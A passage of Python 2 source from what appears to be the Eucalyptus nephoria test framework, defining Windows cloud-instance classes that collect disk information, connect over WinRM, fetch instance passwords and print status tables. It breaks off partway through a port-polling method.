"step-1": "# Software License Agreement (BSD License)\n#\n# Copyright (c) 2009-2011, Eucalyptus Systems, Inc.\n# All rights reserved.\n#\n# Redistribution and use of this software in source and binary forms, with or\n# without modification, are permitted provided that the following conditions\n# are met:\n#\n# Redistributions of source code must retain the above\n# copyright notice, this list of conditions and the\n# following disclaimer.\n#\n# Redistributions in binary form must reproduce the above\n# copyright notice, this list of conditions and the\n# following disclaimer in the documentation and/or other\n# materials provided with the distribution.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\n# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE\n# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE\n# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR\n# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF\n# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS\n# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN\n# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)\n# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE\n# POSSIBILITY OF SUCH DAMAGE.\n#\n# Author: [email protected]\n\n\n'''\n@author: clarkmatthew\nextension of the boto instance class, with added convenience methods + objects\nAdd common instance test routines to this class\n\nExamples:\nfrom eucaops import Eucaops\nfrom nephoria.windows_instance import WinInstance\ntester = Eucaops(credpath='eucarc-10.111.5.80-eucalyptus-sys_admin')\nwins = WinInstance.make_euinstance_from_instance(tester.get_instances(idstring='i-89E13DA8')[0], tester=tester, keypair='test')\nvol = tester.get_volume(status='available', zone=wins.placement)\nwins.attach_volume(vol)\n\n\n\n'''\n\nimport socket\nimport os\nimport re\nimport time\nimport copy\nimport types\nimport operator\nfrom prettytable import PrettyTable, ALL\nfrom boto.ec2.instance import Instance\nfrom nephoria.aws.ec2.euvolume import EuVolume\nfrom cloud_utils.log_utils import eulogger, get_line, markup\nfrom nephoria.euca.taggedresource import TaggedResource\nfrom boto.ec2.instance import InstanceState\nfrom datetime import datetime\nfrom cloud_utils.net_utils import winrm_connection\n\ntermline = get_line()\n\nclass WinInstanceDiskType():\n gigabyte = 1073741824\n megabyte = 1048576\n def __init__(self, win_instance, wmic_dict):\n self.check_dict_requires(wmic_dict)\n self.__dict__ = self.convert_numbers_in_dict(copy.copy(wmic_dict))\n self.win_instance = win_instance\n self.size_in_gb = self.get_size_in_gb()\n self.size_in_mb = self.get_size_in_mb()\n self.size = long(self.size or 0)\n self.last_updated = time.time()\n self.setup()\n\n def setup(self):\n raise Exception('Not Implemented')\n\n def check_dict_requires(self, wmic_dict):\n raise Exception('Not Implemented')\n\n def convert_numbers_in_dict(self, dict):\n #convert strings representing numbers to ints\n for key in dict:\n value = str(dict[key])\n if (re.search(\"\\S\", str(dict[key])) and not re.search(\"\\D\", str(dict[key]))):\n dict[key] = long(dict[key])\n return dict\n\n def get_partition_ids(self):\n retlist = []\n for part in self.disk_partitions:\n retlist.append(part.deviceid)\n return retlist\n\n def get_logicaldisk_ids(self):\n retlist = []\n for part in self.disk_partitions:\n retlist.extend(part.get_logicaldisk_ids())\n return retlist\n\n def get_size_in_gb(self):\n '''\n Attempts to convert self.size from bytes to gigabytes as well as round up > .99 to account for a differences\n in how the size is represented\n '''\n self.size = int(self.size or 0)\n gigs = self.size / self.gigabyte\n if (self.size % self.gigabyte) /float(self.gigabyte) > .99:\n gigs += 1\n return gigs\n\n def get_size_in_mb(self):\n '''\n Attempts to convert self.size from bytes to gigabytes as well as round up > .99 to account for a differences\n in how the size is represented\n '''\n self.size = int(self.size or 0)\n mb = self.size / self.megabyte\n if (self.size % self.megabyte) /float(self.megabyte) > .99:\n mb += 1\n return mb\n\n def print_self(self):\n self.get_summary(printmethod=self.win_instance.debug)\n\n def get_summary(self, printheader=True, printmethod=None):\n raise Exception('Method not implemented')\n\n\n def print_self_full(self, printmethod=None):\n '''\n formats and prints self.dict\n '''\n self.win_instance.print_dict(dict=self.__dict__, printmethod=printmethod)\n\n\n\nclass WinInstanceDiskDrive(WinInstanceDiskType):\n\n def setup(self):\n if not hasattr(self, 'serialnumber'):\n self.serialnumber = ''\n if not hasattr(self, 'caption'):\n self.caption = ''\n if hasattr(self, 'model'):\n self.caption = self.model\n else:\n self.model = self.caption\n self.cygwin_scsi_drive = self.win_instance.get_cygwin_scsi_dev_for_windows_drive(windisk=self)\n self.update_ebs_info()\n self.disk_partitions = []\n\n def check_dict_requires(self, wmic_dict):\n if not ('deviceid' in wmic_dict and\n 'size' in wmic_dict and\n ('caption' in wmic_dict or 'model in wmic_dict') and\n 'index' in wmic_dict):\n raise Exception('wmic_dict passed does not contain needed attributes; deviceid, size, caption, and index')\n\n\n def get_partition_ids(self):\n retlist = []\n for part in self.disk_partitions:\n retlist.append(part.deviceid)\n return retlist\n\n def get_logicaldisk_ids(self):\n retlist = []\n for part in self.disk_partitions:\n retlist.extend(part.get_logicaldisk_ids())\n return retlist\n\n def update_md5_info_from_ebs(self):\n self.md5 = None\n self.md5len = None\n for vol in self.win_instance.attached_vols:\n if vol.guestdev == self.deviceid:\n if not vol.md5:\n vol.md5len = 1024\n vol.md5 = self.win_instance.get_dev_md5(self.cygwin_scsi_drive, vol.md5len)\n self.md5 = vol.md5\n self.md5len = vol.md5len\n break\n\n def update_ebs_info_from_serial_number(self):\n '''\n Attempts to parse the serial number field from an EBS volume and find the correlating ebs volume\n example format: vol-81C13EA4-dev-sdg\n '''\n if re.match(\"^vol-\", self.serialnumber):\n split = self.serialnumber.split('-')\n self.ebs_volume = str(split[0]) + \"-\" + str(split[1])\n self.ebs_cloud_dev = \"/\" + str(split[2]) + \"/\" + str(split[3])\n else:\n self.ebs_volume = ''\n self.ebs_cloud_dev = ''\n\n\n def update_ebs_info(self):\n self.update_ebs_info_from_serial_number()\n if not self.ebs_volume:\n if self.index == 0 and self.win_instance.root_device_type == 'ebs':\n bdm = self.win_instance.block_device_mapping[self.win_instance.root_device_name]\n self.ebs_volume = bdm.volume_id\n else:\n for vol in self.win_instance.attached_vols:\n if vol.guestdev == self.deviceid:\n self.ebs_volume = vol.id\n break\n if not self.ebs_cloud_dev and self.ebs_volume:\n volume = self.win_instance.tester.get_volume(volume_id=self.ebs_volume)\n if hasattr(volume,'attach_data') and volume.attach_data:\n self.ebs_cloud_dev = volume.attach_data.device\n self.update_md5_info_from_ebs()\n\n\n\n\n def get_summary(self, printheader=True, printmethod=None):\n buf = \"\"\n deviceid = 20\n size = 16\n sizegb = 7\n ebsvol = 12\n serialnumber = 24\n caption = 36\n part_count = 6\n logical_ids = 8\n cygdrive = 10\n md5 = 32\n header = \"DISKDRIVE DEV ID\".center(deviceid) + \"|\" + \\\n \"SIZE B\".center(size) + \"|\" + \\\n \"SIZE GB\".center(sizegb) + \"|\" + \\\n \"EBS VOL\".center(ebsvol) + \"|\" + \\\n \"CAPTION\".center(caption) + \"|\" + \\\n \"PARTS\".center(part_count) + \"|\" + \\\n \"LOGICAL\".center(logical_ids) + \"|\" + \\\n \"CYGDRIVE\".center(cygdrive) + \"|\" + \\\n \"SERIAL NUMBER\".center(serialnumber) + \"|\" + \\\n \"MD5 CHECK SUM\".center(md5) + \"|\"\n\n summary = str(self.deviceid).center(deviceid) + \"|\" + \\\n str(self.size).center(size) + \"|\" + \\\n str(self.size_in_gb).center(sizegb) + \"|\" + \\\n str(self.ebs_volume).center(ebsvol) + \"|\" + \\\n str(self.caption).center(caption) + \"|\" + \\\n str(self.partitions).center(part_count) + \"|\" + \\\n str(\",\".join(str(x) for x in self.get_logicaldisk_ids())).center(logical_ids) + \"|\" + \\\n str(self.cygwin_scsi_drive).center(cygdrive) + \"|\" + \\\n str(self.serialnumber).center(serialnumber) + \"|\" + \\\n str(self.md5).center(md5) + \"|\"\n\n length = len(header)\n if len(summary) > length:\n length = len(summary)\n line = get_line(length)\n if printheader:\n buf += line + header + line\n buf += summary + line\n if printmethod:\n printmethod(buf)\n return buf\n\n\nclass WinInstanceDiskPartition(WinInstanceDiskType):\n\n def setup(self):\n #self.cygwin_scsi_drive = self.win_instance.get_cygwin_scsi_dev_for_windows_drive(drive_id=self.deviceid)\n self.logicaldisks = []\n #Set values in case 'brief' was used when fetching partitions\n if not hasattr(self,'deviceid'):\n self.deviceid = self.name\n if not hasattr(self,'bootable'):\n self.bootable = self.bootpartition\n if not hasattr(self,'diskindex'):\n self.diskindex = self.get_disk_index_from_name()\n\n def check_dict_requires(self, wmic_dict):\n if not ('name' in wmic_dict and\n 'size' in wmic_dict and\n 'bootpartition' in wmic_dict and\n 'index' in wmic_dict):\n raise Exception('wmic_dict passed does not contain needed attributes; deviceid, size, index and bootable')\n\n\n def get_disk_index_from_name(self):\n diskindex = None\n diskindexstring = self.name.split(',')[0]\n if re.search('disk', diskindexstring, re.IGNORECASE):\n diskindex = int(diskindexstring.split('#')[1])\n return diskindex\n\n def get_logicaldisk_ids(self):\n retlist = []\n for disk in self.logicaldisks:\n retlist.append(disk.deviceid)\n return retlist\n\n def get_summary(self, printheader=True, printmethod=None):\n buf = \"\"\n deviceid = 24\n size = 16\n sizegb = 12\n sizemb = 12\n bootable = 10\n header = \"PARTITION DEV ID\".center(deviceid) + \"|\" + \\\n \"SIZE B\".center(size) + \"|\" + \\\n \"SIZE GB\".center(sizegb) + \"|\" + \\\n \"SIZE MB\".center(sizemb) + \"|\" + \\\n \"BOOTABLE\".center(bootable) + \"|\"\n\n summary = str(self.deviceid).center(deviceid) + \"|\" + \\\n str(self.size).center(size) + \"|\" + \\\n str(self.size_in_gb).center(sizegb) + \"|\" + \\\n str(self.size_in_mb).center(sizemb) + \"|\" + \\\n str(self.bootable).center(bootable) + \"|\"\n\n length = len(header)\n if len(summary) > length:\n length = len(summary)\n line = get_line(length)\n if printheader:\n buf += line + header + line\n buf += summary + line\n if printmethod:\n printmethod(buf)\n return buf\n\n\nclass WinInstanceLogicalDisk(WinInstanceDiskType):\n\n def setup(self):\n self.cygwin_scsi_drive = self.win_instance.get_cygwin_scsi_dev_for_windows_drive(windisk=self)\n self.partition = None\n\n def check_dict_requires(self, wmic_dict):\n if not ('deviceid' in wmic_dict and\n 'size' in wmic_dict and\n 'description' in wmic_dict and\n 'freespace' in wmic_dict and\n 'filesystem' in wmic_dict):\n raise Exception('wmic_dict passed does not contain needed attributes; deviceid, size, and description')\n\n def get_summary(self, printheader=True, printmethod=None):\n buf = \"\"\n deviceid = 24\n size = 16\n freespace = 16\n filesystem = 24\n description = 30\n cygdrive = 10\n header = \"LOGICAL DEV ID\".center(deviceid) + \"|\" + \\\n \"SIZE\".center(size) + \"|\" + \\\n \"FREE SPACE\".center(freespace) + \"|\" + \\\n \"FILE SYSTEM\".center(filesystem) + \"|\" + \\\n \"DESCRIPTION\".center(description) + \"|\" + \\\n \"CYGDRIVE\".center(cygdrive) + \"|\"\n summary = str(self.deviceid).center(deviceid) + \"|\" + \\\n str(self.size).center(size) + \"|\" + \\\n str(self.freespace).center(freespace) + \"|\" + \\\n str(self.filesystem).center(filesystem) + \"|\" + \\\n str(self.description).center(description) + \"|\" + \\\n str(self.cygwin_scsi_drive).center(cygdrive) + \"|\"\n length = len(header)\n if len(summary) > length:\n length = len(summary)\n line = get_line(length)\n if printheader:\n buf += line + header + line\n buf += summary + line\n if printmethod:\n printmethod(buf)\n return buf\n\n\nclass WinInstance(Instance, TaggedResource):\n gigabyte = 1073741824\n megabyte = 1048576\n\n @classmethod\n def make_euinstance_from_instance(cls,\n instance,\n tester,\n debugmethod = None,\n keypair=None,\n keypath=None,\n password=None,\n username=\"Administrator\",\n auto_connect = True,\n verbose=True,\n timeout=120,\n private_addressing = False,\n reservation = None,\n cmdstart=None,\n try_non_root_exec=True,\n winrm_port='5985',\n winrm_protocol='http',\n rdp_port='3389',\n rootfs_device = \"sda\",\n block_device_prefix = \"sd\",\n bdm_root_vol = None,\n virtio_blk = True,\n cygwin_path = None,\n disk_update_interval=10,\n retry=2,\n brief=False\n ):\n '''\n Primary constructor for this class. Note: to avoid an ssh session within this method, provide keys, username/pass later.\n Arguments:\n instance - mandatory- a Boto instance object used to build this euinstance object\n keypair - optional- a boto keypair object used for creating ssh connection to the instance\n username - optional- string used to create ssh connection as an alternative to keypair\n password - optional- string used to create ssh connection to this instance as an alternative to keypair\n exec_password -optional -string used for su or sudo where prompted for password, will default to 'password'\n auto_connect -optional -boolean, if True will attempt to automatically create an ssh session for this instance\n try_non_root_exec -optional -boolean, if True will attempt to use sudo if available else su -c to execute privileged commands\n timeout - optional- integer used for ssh connection timeout\n debugmethod - optional - method, used for debug output\n verbose - optional - boolean to determine if debug is to be printed using debug()\n retry - optional - integer, ssh connection attempts for non-authentication failures\n '''\n newins = WinInstance(instance.connection)\n newins.__dict__ = instance.__dict__\n newins.tester = tester\n newins.winrm_port = winrm_port\n newins.rdp_port = rdp_port\n newins.bdm_root_vol = None\n newins.winrm_protocol = winrm_protocol\n newins.debugmethod = debugmethod\n if newins.debugmethod is None:\n newins.log = eulogger.Eulogger(identifier= str(instance.id))\n newins.debugmethod= newins.log.debug\n\n if (keypair is not None):\n if isinstance(keypair,types.StringTypes):\n keyname = keypair\n keypair = tester.get_keypair(keyname)\n else:\n keyname = keypair.name\n newins.keypath = keypath or os.getcwd() + \"/\" + keyname + \".pem\"\n newins.keypair = keypair\n newins.password = password\n newins.username = username\n newins.verbose = verbose\n newins.attached_vols=[]\n newins.timeout = timeout\n newins.virtio_blk = virtio_blk\n newins.disk_update_interval = disk_update_interval\n newins.retry = retry\n newins.brief = brief\n newins.rootfs_device = rootfs_device\n newins.block_device_prefix = block_device_prefix\n newins.private_addressing = private_addressing\n newins.reservation = reservation or newins.get_reservation()\n if newins.reservation:\n newins.security_groups = newins.tester.get_instance_security_groups(newins)\n else:\n newins.security_groups = None\n newins.laststate = newins.state\n newins.cmdstart = cmdstart\n newins.auto_connect = auto_connect\n newins.set_last_status()\n newins.update_vm_type_info()\n newins.cygwin_path = cygwin_path\n newins.system_info = None\n newins.diskdrives = []\n newins.disk_partitions = []\n newins.logicaldisks = []\n newins.cygwin_dev_map = {}\n #newins.set_block_device_prefix()\n if newins.root_device_type == 'ebs':\n try:\n volume = newins.tester.get_volume(volume_id = newins.block_device_mapping.get(newins.root_device_name).volume_id)\n newins.bdm_root_vol = EuVolume.make_euvol_from_vol(volume, tester=newins.tester,cmdstart=newins.cmdstart)\n except:pass\n newins.winrm = None\n if newins.auto_connect and newins.state == 'running':\n newins.connect_to_instance(timeout=timeout)\n return newins\n\n @property\n def age(self):\n launchtime = self.tester.get_datetime_from_resource_string(self.launch_time)\n # return the elapsed time in seconds\n return (time.mktime(datetime.utcnow().utctimetuple()) -\n time.mktime(launchtime.utctimetuple()))\n\n def update(self, validate=False, dry_run=False,\n err_state='terminated', err_code=-1):\n ret = None\n tb = \"\"\n retries = 2\n for x in xrange(0, retries):\n try:\n #send with validation True, fail later...\n ret = super(WinInstance, self).update(validate=True,\n dry_run=dry_run)\n break\n except ValueError:\n if validate:\n raise\n tb = self.tester.get_traceback()\n self.debug('Failed to update instance. Attempt:{0}/{1}'\n .format(x, retries))\n if not ret:\n failmsg = 'Failed to update instance. Instance may no longer ' \\\n 'be present on system\"{0}\"'.format(self.id)\n self.debug('{0}\\n{1}'.format(tb, failmsg))\n self.debug('{0} setting fake state to:\"{1}\"'.format(self.id,\n err_state))\n state = InstanceState(name=err_state, code=err_code)\n self._state = state\n ret = self.state\n self.set_last_status()\n return ret\n\n\n def update_vm_type_info(self):\n self.vmtype_info = self.tester.get_vm_type_from_zone(self.placement,self.instance_type)\n return self.vmtype_info\n\n\n def set_last_status(self,status=None):\n self.laststate = self.state\n self.laststatetime = time.time()\n self.age_at_state = self.tester.get_instance_time_launched(self)\n #Also record age from user's perspective, ie when they issued the run instance request (if this is available)\n if self.cmdstart:\n self.age_from_run_cmd = \"{0:.2f}\".format(time.time() - self.cmdstart)\n else:\n self.age_from_run_cmd = None\n\n def print_dict(self, dict=None, printmethod=None):\n '''\n formats and prints\n '''\n printmethod = printmethod or self.debug\n buf = \"\\n\"\n dict = dict or self.__dict__\n longest_key = 0\n for key in dict:\n if len(key) > longest_key:\n longest_key = len(key)\n for key in dict:\n buf += str(key).ljust(longest_key) + \" -----> :\" + str(dict[key]) + \"\\n\"\n printmethod(buf)\n\n def printself(self, title=True, footer=True, printmethod=None, printme=True):\n\n def state_markup(state):\n # Markup instance state...\n if state == 'running':\n return markup(state, markups=[1, 92])\n if state == 'terminated':\n return markup(state, markups=[1, 97])\n if state == 'shutting-down':\n return markup(state, markups=[1, 95])\n if state == 'pending':\n return markup(state, markups=[1, 93])\n if state == 'stopped':\n return markup(state, markups=[1, 91])\n else:\n return markup(state, markups=[1, 91])\n\n def multi_line(lines):\n # Utility method for creating multi line table entries...\n buf = \"\"\n maxlen = 0\n for line in lines:\n if len(line) + 2 > maxlen:\n maxlen = len(line) + 2\n for line in lines:\n buf += str(line).ljust(maxlen) + \"\\n\"\n buf = buf.rstrip()\n return (buf, maxlen)\n\n bdmvol = self.root_device_type\n if self.bdm_root_vol:\n bdmvol += \":\" + self.bdm_root_vol.id\n reservation_id = None\n if self.reservation:\n reservation_id = self.reservation.id\n owner_id = self.reservation.owner_id\n else:\n owner_id = \"???\"\n # Create a multi line field for instance's run info\n idlist = [markup(\"{0} {1}\".format('ID:', self.id), markups=[1, 4, 94]),\n \"{0} {1}\".format(markup('TYPE:'), self.instance_type),\n \"{0} {1}\".format(markup('RES:'), reservation_id),\n \"{0}\".format(markup(\"ACCOUNT ID:\")), owner_id]\n id_string, idlen = multi_line(idlist)\n try:\n emi = self.tester.get_emi(self.image_id)\n emi_name = str(emi.name[0:18]) + \"..\"\n except:\n emi_name = \"\"\n # Create a multi line field for the instance's image info\n virt_type = 'PV'\n if self.virtualization_type == 'hvm':\n virt_type = 'HVM'\n emi_string, emilen = multi_line(\n [markup(\"{0} {1}\".format('EMI:', self.image_id)),\n \"{0} {1}\".format(markup('OS:'), self.platform or 'linux'),\n \"{0} {1}\".format(markup('VIRT:'), virt_type),\n \"{0}\".format(markup('IMAGE NAME:')),\n emi_name])\n\n # Create a multi line field for the instance's state info\n if self.age:\n age = int(self.age)\n state_string, state_len = multi_line([\"STATE: \" + state_markup(self.laststate),\n \"{0} {1}\".format(markup('AGE:'), age),\n \"{0} {1}\".format(markup(\"ZONE:\"), self.placement),\n markup('ROOTDEV:'), bdmvol])\n # Create the primary table called pt...\n netinfo = 'INSTANCE NETWORK INFO:'\n idheader = 'INSTANCE ID'\n imageheader = 'INSTANCE IMAGE'\n stateheader = 'INSTANCE STATE'\n pt = PrettyTable([idheader, imageheader, stateheader, netinfo])\n pt.align[netinfo] = 'l'\n pt.valign[netinfo] = 'm'\n pt.align[idheader] = 'l'\n pt.align[imageheader] = 'l'\n pt.align[stateheader] = 'l'\n pt.max_width[idheader] = idlen\n pt.max_width[imageheader] = emilen\n pt.max_width[stateheader] = state_len\n pt.padding_width = 0\n pt.hrules = ALL\n # PrettyTable headers do not work with ascii markups, so make a sudo header\n new_header = []\n for field in pt._field_names:\n new_header.append(markup(field, markups=[1, 4]))\n pt.add_row(new_header)\n pt.header = False\n # Create a subtable 'netpt' to summarize and format the networking portion...\n # Set the maxwidth of each column so the tables line up when showing multiple instances\n vpc_col = ('VPC', 4)\n subnet_col = ('SUBNET', 6)\n if self.vpc_id:\n vpc_col = ('VPC', 12)\n subnet_col = ('SUBNET', 15)\n secgrp_col = ('SEC GRPS', 11)\n privaddr_col = ('P', 1)\n privip_col = ('PRIV IP', 15)\n pubip_col = ('PUB IP', 15)\n net_cols = [vpc_col, subnet_col, secgrp_col, privaddr_col, privip_col, pubip_col]\n # Get the Max width of the main tables network summary column...\n # Start with 2 to account for beginning and end column borders\n netinfo_width = 2\n netinfo_header = []\n for col in net_cols:\n netinfo_width += col[1] + 1\n netinfo_header.append(col[0])\n pt.max_width[netinfo] = netinfo_width\n netpt = PrettyTable([vpc_col[0], subnet_col[0], secgrp_col[0], privaddr_col[0],\n privip_col[0], pubip_col[0]])\n netpt.padding_width = 0\n netpt.vrules = ALL\n for col in net_cols:\n netpt.max_width[col[0]] = col[1]\n sec_grps = []\n for grp in self.groups:\n sec_grps.append(str(grp.id))\n sec_grps = \",\".join(sec_grps)\n private_addressing = \"N\"\n if self.private_addressing:\n private_addressing = \"Y\"\n netpt.add_row([str(self.vpc_id).center(vpc_col[1]),\n str(self.subnet_id).center(subnet_col[1]),\n str(sec_grps).center(secgrp_col[1]),\n str(private_addressing).center(privaddr_col[1]),\n str(self.private_ip_address).center(privip_col[1]),\n str(self.ip_address).center(pubip_col[1])])\n # To squeeze a potentially long keyname under the network summary table, get the length\n # and format this column to allow for wrapping a keyname under the table...\n # netbuf = netpt.get_string()\n netbuf = \"{0}:{1} {2}:{3}\\n\".format(markup(\"NODE\"),\n self.tags.get('euca:node', \"???\").ljust(16),\n markup(\"KEYPAIR\"), self.key_name)\n netbuf += \"\\n\".join(netpt.get_string().splitlines()[0:-1])\n # Create the row in the main table...\n pt.add_row([id_string, emi_string, state_string, netbuf])\n if printme:\n printmethod = printmethod or self.log.debug\n printmethod(\"\\n\" + str(pt) + \"\\n\")\n return pt\n\n\n\n def get_password(self,\n private_key_path=None,\n key=None,\n dir=None,\n exten=\".pem\",\n encoded=True,\n force_update=False):\n '''\n :param private_key_path: private key file used to decrypt password\n :param key: name of private key\n :param dir: Path to private key\n :param exten: extension of private key\n :param encoded: boolean of whether string returned from server is\n Base64 encoded\n :return: decrypted password\n '''\n if self.password is None or force_update:\n self.password = self.tester.get_windows_instance_password(\n self,\n private_key_path=private_key_path,\n key=key,\n dir=dir,\n exten=exten,\n encoded=encoded)\n return self.password\n\n\n def reset_ssh_connection(self, timeout=None):\n # todo: Remove ssh reference from this method, use something like\n # reset_instance_connection, etc..\n self.debug('Note ssh not implemented at this time, using winrm for '\n 'shell access instead...')\n return self.reset_winrm_connection(timeout=timeout)\n\n def reset_winrm_connection(self, timeout=None, force=False):\n # todo:\n timeout = timeout or self.timeout\n self.debug('reset_winrm_connection for:'+str(self.id))\n self.get_password(force_update=True)\n if self.username is None or self.password is None:\n #Allow but warn here as this may be a valid negative test\n self.debug('Warning username and/or password were None in '\n 'winrm connnection?')\n # Create a new winrm interface if this is a new instance or\n # an attribute has changed...\n try:\n #Check the port in order to provide debug if the connection fails\n self.test_port_status(port=self.winrm_port, ip=self.ip_address)\n except:pass\n if force or not (self.winrm and \\\n self.winrm.hostname == self.ip_address and \\\n self.winrm.username == self.username and \\\n self.winrm.password == self.password):\n if self.winrm:\n self.winrm.close_shell()\n self.winrm = winrm_connection.Winrm_Connection(\n hostname = self.ip_address,\n username = self.username,\n password = self.password,\n port = self.winrm_port,\n protocol = self.winrm_protocol,\n debug_method = self.debug,\n verbose=True\n )\n\n\n def get_reservation(self):\n res = None\n try:\n res = self.tester.get_reservation_for_instance(self)\n except Exception, e:\n self.update()\n self.debug('Could not get reservation for instance in state:' +\n str(self.state) + \", err:\" + str(e))\n return res\n\n\n def connect_to_instance(self, wait_for_boot=180, timeout=120):\n '''\n Attempts to connect to an instance via ssh.\n :params wait_for_boot: time to wait, allowing guest to boot before\n attempting to poll for ports active status\n :params timeout: -optional - time in seconds to wait when polling\n port(s) status(s) before failure\n\n '''\n self.debug(\"{0}connect_to_instance starting.\\nwait_for_boot:{1} \"\n \"seconds\\ntimeout from boot:{2}{3}\"\n .format(termline, wait_for_boot, timeout, termline))\n try:\n self.poll_for_port_status_with_boot_delay(waitforboot=wait_for_boot,\n timeout=timeout)\n except Exception, e:\n self.debug('Warning failed to poll port status:' + str(e))\n self.debug(\"Attempting to create connection to instance:\" + self.id)\n attempts = 0\n start = time.time()\n elapsed = 0\n if self.winrm is not None:\n self.winrm.close_shell()\n self.winrm = None\n while (elapsed < timeout):\n attempts += 1\n try:\n self.update()\n self.reset_winrm_connection()\n self.debug('Try some sys...')\n self.sys(\"whoami\")\n except Exception, se:\n tb = self.tester.get_traceback()\n self.debug('Caught exception attempting to connect '\n 'winrm shell:\\n'+ str(tb) + str(se))\n elapsed = int(time.time()-start)\n self.debug('connect_to_instance: Attempts:' + str(attempts) +\n ', elapsed:'+str(elapsed)+'/'+str(timeout))\n if self.winrm is not None:\n self.winrm.close_shell()\n self.winrm = None\n time.sleep(5)\n pass\n else:\n break\n elapsed = int(time.time()-start)\n if self.winrm is None:\n self.get_connection_debug()\n raise RuntimeError(str(self.id) +\n \":Failed establishing management connection to \"\n \"instance, elapsed:\" + str(elapsed) +\n \"/\" + str(timeout))\n self.debug('Connect_to_instance updating attached volumes/disk '\n 'info for vols: ' + str(self.attached_vols))\n if self.brief:\n self.update_system_info()\n else:\n self.update_system_and_disk_info()\n self.init_attached_volumes()\n self.debug(\"{0}connect_to_instance completed{1}\"\n .format(termline, termline))\n\n def get_connection_debug(self):\n # Add network debug/diag info here...\n # First show arp cache from local machine\n # todo Consider getting info from relevant euca components:\n # - iptables info\n # - route info\n # - instance xml\n try:\n # Show local ARP info...\n arp_out = \"\\nLocal ARP cache for instance ip: \" \\\n + str(self.ip_address) + \"\\n\"\n arp_fd = os.popen('arp ' + str(self.ip_address))\n for line in arp_fd:\n arp_out += line\n self.debug(arp_out)\n except Exception as AE:\n self.log.debug('Failed to get arp info:' + str(AE))\n try:\n self.tester.get_console_output(self)\n except Exception as CE:\n self.log.debug('Failed to get console output:' + str(CE))\n\n def update_root_device_diskdrive(self):\n if not self.root_device_type == 'ebs':\n return\n for disk in self.diskdrives:\n if disk.index == 0:\n if disk.ebs_volume:\n for vol in self.attached_vols:\n if vol.id == disk.ebs_volume:\n if not disk.md5:\n disk.update_md5_info_from_ebs()\n return\n volume = self.tester.get_volume(volume_id=disk.ebs_volume)\n if not isinstance(volume, EuVolume):\n volume = EuVolume.make_euvol_from_vol(volume, self.tester)\n volume.guestdev = disk.deviceid\n volume.md5len = 1024\n volume.md5 = self.get_dev_md5(disk.cygwin_scsi_drive, volume.md5len)\n if not self.get_volume_from_attached_list_by_id(volume.id):\n self.debug(\"{0} updating with root vol:{1}{2}\"\n .format(termline,\n volume.id,\n termline))\n self.attached_vols.append(volume)\n disk.update_md5_info_from_ebs()\n return\n\n def get_volume_from_attached_list_by_id(self, volume_id):\n for vol in self.attached_vols:\n if vol.id == volume_id:\n return vol\n\n\n def update_system_and_disk_info(self):\n try:\n self.update_system_info()\n except Exception, sie:\n tb = self.tester.get_traceback()\n self.debug(str(tb) + \"\\nError updating system info:\" + str(sie))\n try:\n self.update_disk_info()\n self.update_root_device_diskdrive()\n self.print_partition_summary()\n self.print_logicaldisk_summary()\n self.print_diskdrive_summary()\n except Exception, ude:\n tb = self.tester.get_traceback()\n self.debug(str(tb) + \"\\nError updating disk info:\" + str(ude))\n\n\n def has_sudo(self):\n return False\n\n\n def debug(self,msg,traceback=1,method=None,frame=False):\n '''\n Used to print debug, defaults to print() but over ridden by self.debugmethod if not None\n msg - mandatory -string, message to be printed\n '''\n if ( self.verbose is True ):\n self.debugmethod(msg)\n\n def sys(self, cmd, verbose=True, code=None, include_stderr=False, enable_debug=False, timeout=None):\n '''\n Issues a command against the ssh connection to this instance\n Returns a list of the lines from stdout+stderr as a result of the command\n cmd - mandatory - string, the command to be executed\n verbose - optional - boolean flag to enable debug\n timeout - optional - command timeout in seconds\n '''\n if (self.winrm is None):\n raise Exception(\"WinInstance winrm connection is None\")\n return self.winrm.sys(command=cmd, include_stderr=include_stderr, timeout=timeout, verbose=verbose, code=code)\n\n\n\n\n def test_rdp_port_status(self, ip=None, port=3389, timeout=10):\n '''\n Description: Attempts to test that the host is accepting tcp connections to the RDP port\n '''\n ip = ip or self.ip_address\n return self.test_port_status(ip=ip, port=port, timeout=timeout)\n\n\n def test_port_status(self, port, ip=None, timeout=5, tcp=True, verbose=True):\n ip = ip or self.ip_address\n return self.tester.test_port_status(ip, int(port), timeout=timeout, tcp=tcp, verbose=verbose)\n\n def poll_for_port_status_with_boot_delay(self, interval=15, ports=[], socktimeout=5,timeout=180, waitforboot=300):\n '''\n Make sure some time has passed before we test on the guest side before running guest test...\n\n '''\n launch_seconds = self.tester.get_instance_time_launched(self)\n sleeptime = 0 if launch_seconds > waitforboot else (waitforboot - launch_seconds)\n self.debug(\"Instance was launched \"+str(launch_seconds)+\" seconds ago, waiting:\"+str(sleeptime)+\" for instance to boot\")\n time.sleep(sleeptime)\n return self.poll_for_ports_status(ports,\n ip=self.ip_address,\n interval=interval,\n socktimeout=socktimeout,\n timeout=timeout)\n\n def wait_for_time_since_launch(self,waitforboot=420):\n '''\n When using larger instance store images, this can allow for the delays caused by image size/transfer.\n '''\n boot_seconds = self.tester.get_instance_time_launched(self)\n sleeptime = 0 if boot_seconds > waitforboot else (waitforboot - boot_seconds)\n self.debug(\"Instance was launched \"+str(boot_seconds)+\"/\"+str(waitforboot) + \" seconds ago, waiting:\"+str(sleeptime)+\" for instance to boot\")\n start = time.time()\n elapsed = 0\n print \"Waiting for Windows to fully boot:\",\n while elapsed < sleeptime:\n print \"Waiting for Windows to fully boot:\"+str(sleeptime-elapsed),\n time.sleep(5)\n elapsed=int(time.time()-start)\n self.debug(\"test_wait_for_instance_boot: done waiting, instance up for \"+str(waitforboot)+\" seconds\")\n\n def poll_for_ports_status(self, ports=[], 